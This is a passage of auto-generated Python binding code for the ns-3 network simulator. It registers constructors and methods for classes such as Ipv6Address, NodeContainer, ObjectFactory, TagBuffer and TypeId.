is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint16_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Mask', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'mask')]) return def register_Ns3Ipv6Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv6-address.h (module 'network'): 
ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor] cls.add_constructor([param('uint8_t *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor] cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function] cls.add_method('CombinePrefix', 'ns3::Ipv6Address', [param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv6Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv6Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function] cls.add_method('GetAllHostsMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function] cls.add_method('GetAllNodesMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function] cls.add_method('GetAllRoutersMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 
'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function] cls.add_method('GetIpv4MappedAddress', 'ns3::Ipv4Address', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function] cls.add_method('IsAllHostsMulticast', 'bool', [], deprecated=True, is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function] cls.add_method('IsAllNodesMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function] cls.add_method('IsAllRoutersMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function] cls.add_method('IsDocumentation', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Address const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool 
ns3::Ipv6Address::IsIpv4MappedAddress() const [member function] cls.add_method('IsIpv4MappedAddress', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function] cls.add_method('IsLinkLocal', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function] cls.add_method('IsLinkLocalMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function] cls.add_method('IsSolicitedMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member 
function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function] cls.add_method('MakeIpv4MappedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv4Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function] cls.add_method('MakeSolicitedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv6Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member 
function] cls.add_method('Set', 'void', [param('char const *', 'address')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function] cls.add_method('Set', 'void', [param('uint8_t *', 'address')]) return def register_Ns3Ipv6Prefix_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor] cls.add_constructor([param('uint8_t *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor] cls.add_constructor([param('char const *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor] cls.add_constructor([param('uint8_t', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function] 
cls.add_method('GetPrefixLength', 'uint8_t', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Prefix const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) return def register_Ns3NodeContainer_methods(root_module, cls): ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor] cls.add_constructor([]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor] cls.add_constructor([param('std::string', 'nodeName')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, 
ns3::NodeContainer const & c) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::NodeContainer', 'other')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function] cls.add_method('Add', 'void', [param('std::string', 'nodeName')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<ns3::Ptr<ns3::Node> const*, std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node >, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 
'network'): void ns3::NodeContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n'), param('uint32_t', 'systemId')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<ns3::Ptr<ns3::Node> const*, std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node >, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Node >', [param('uint32_t', 'i')], is_const=True) ## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::NodeContainer', [], is_static=True) ## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return def register_Ns3ObjectBase_methods(root_module, cls): ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor] cls.add_constructor([]) ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')]) ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & value) const [member 
function] cls.add_method('GetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool 
ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function] cls.add_method('ConstructSelf', 'void', [param('ns3::AttributeConstructionList const &', 'attributes')], visibility='protected') ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function] cls.add_method('NotifyConstructionCompleted', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectDeleter_methods(root_module, cls): ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor] cls.add_constructor([]) ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')]) ## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function] cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')], is_static=True) return def register_Ns3ObjectFactory_methods(root_module, cls): cls.add_output_stream_operator() ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor] cls.add_constructor([param('std::string', 'typeId')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True) ## 
object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) ## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function] cls.add_method('SetTypeId', 'void', [param('ns3::TypeId', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function] cls.add_method('SetTypeId', 'void', [param('char const *', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function] cls.add_method('SetTypeId', 'void', [param('std::string', 'tid')]) return def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3TagBuffer_methods(root_module, cls): ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor] cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')]) ## 
tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor] cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function] cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function] cls.add_method('ReadDouble', 'double', []) ## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function] cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function] cls.add_method('WriteDouble', 'void', [param('double', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) 
[member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')]) return def register_Ns3TimeWithUnit_methods(root_module, cls): cls.add_output_stream_operator() ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::TimeWithUnit const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeWithUnit const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::Time const time, ns3::Time::Unit const unit) [constructor] cls.add_constructor([param('ns3::Time const', 'time'), param('ns3::Time::Unit const', 'unit')]) return def register_Ns3TypeId_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor] cls.add_constructor([param('char const *', 'name')]) ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor] cls.add_constructor([param('ns3::TypeId const &', 'o')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), 
param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')], deprecated=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor, std::string callback, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor'), param('std::string', 
'callback'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function] cls.add_method('GetAttribute', 'ns3::TypeId::AttributeInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function] cls.add_method('GetAttributeFullName', 'std::string', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function] cls.add_method('GetAttributeN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function] cls.add_method('GetConstructor', 'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function] cls.add_method('GetGroupName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function] 